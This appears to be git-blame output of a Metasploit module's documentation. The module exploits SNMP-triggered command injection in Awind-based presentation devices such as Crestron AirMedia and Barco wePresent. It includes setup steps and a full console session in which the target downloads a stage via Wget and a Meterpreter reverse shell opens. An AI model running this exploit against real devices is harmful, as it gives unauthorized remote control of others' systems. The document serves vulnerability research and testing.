2020-01-20 21:26:59 -05:00
## Vulnerable Application
2018-09-11 15:16:23 +02:00
2019-03-28 11:09:39 +01:00
This module exploits a vulnerability found in AwindInc and OEM'ed products where untrusted inputs are fed to `ftpfw.sh` system command, leading to command injection.
2018-09-11 15:16:23 +02:00
2019-03-27 14:13:36 +01:00
Note: a valid SNMP read-write community is required to exploit this vulnerability.
2018-09-11 15:16:23 +02:00
2019-03-27 14:13:36 +01:00
The following devices are known to be affected by this issue:
2018-09-11 15:16:23 +02:00
2019-03-27 14:13:36 +01:00
* Crestron Airmedia AM-100 <= version 1.5.0.4
* Crestron Airmedia AM-101 <= version 2.5.0.12
* Awind WiPG-1600w <= version 2.0.1.8
* Awind WiPG-2000d <= version 2.1.6.2
* Barco wePresent 2000 <= version 2.1.5.7
* Newline Trucast 2 <= version 2.1.0.5
* Newline Trucast 3 <= version 2.1.3.7
2018-09-11 15:16:23 +02:00
2019-03-28 11:09:39 +01:00
Other devices might be affected by the same issue but lack of access to firmware forbids me from confirming that. See https://github.com/QKaiser/awind-research for full list of similar devices.
2018-09-11 15:16:23 +02:00
2020-01-16 11:09:29 -05:00
## Verification Steps
2018-09-11 15:16:23 +02:00
2019-03-28 11:09:39 +01:00
1. Start `msfconsole`
2. Do: `use exploit/linux/snmp/awind_snmp_exec`
3. Do: `set payload linux/armle/meterpreter/reverse_tcp`
4. Do: `set RHOST [IP]`
5. Do: `set LHOST [IP]`
6. Do: `run`
2018-09-11 15:16:23 +02:00
2019-03-28 11:09:39 +01:00
You should get a session.
2018-09-11 15:16:23 +02:00
2019-06-25 20:50:09 +02:00
## Scenarios
2019-03-28 11:09:39 +01:00
2019-06-25 20:50:09 +02:00
```
2019-03-27 14:13:36 +01:00
msf5 > use exploit/linux/snmp/awind_snmp_exec
2019-03-28 11:09:39 +01:00
msf5 exploit(linux/snmp/awind_snmp_exec) > set payload linux/armle/meterpreter/reverse_tcp
payload => linux/armle/meterpreter/reverse_tcp
2019-03-27 14:13:36 +01:00
msf5 exploit(linux/snmp/awind_snmp_exec) > set RHOSTS 192.168.100.2
RHOSTS => 192.168.100.2
msf5 exploit(linux/snmp/awind_snmp_exec) > set LHOST 192.168.100.1
LHOST => 192.168.100.1
msf5 exploit(linux/snmp/awind_snmp_exec) > check
[*] Target system is Crestron Electronics AM-100 (Version 2.6.0.6)
[+] 192.168.100.2:161 The target is vulnerable.
msf5 exploit(linux/snmp/awind_snmp_exec) > run
2019-03-28 11:09:39 +01:00
[*] Started reverse TCP handler on 192.168.100.1:4444
[*] Using URL: http://0.0.0.0:8080/u70HALC
[*] Local IP: http://192.168.1.10:8080/u70HALC
2019-03-27 14:13:36 +01:00
[*] Injecting payload
[*] Injection successful
[*] Triggering call
[*] Trigger successful
2019-03-28 11:09:39 +01:00
[*] Client 192.168.100.2 (Wget) requested /u70HALC
[*] Sending payload to 192.168.100.2 (Wget)
[*] Sending stage (806872 bytes) to 192.168.100.2
[*] Command Stager progress - 100.00% done (113/113 bytes)
[*] Meterpreter session 2 opened (192.168.100.1:4444 -> 192.168.100.2:38009) at 2019-03-28 11:01:41 +0100
[*] Server stopped.
meterpreter > sysinfo
Computer : Crestron.AirMedia-1.1.wm8750
OS : (Linux 2.6.32.9-default)
Architecture : armv6l
BuildTuple : armv5l-linux-musleabi
Meterpreter : armle/linux
2019-06-25 20:50:09 +02:00
```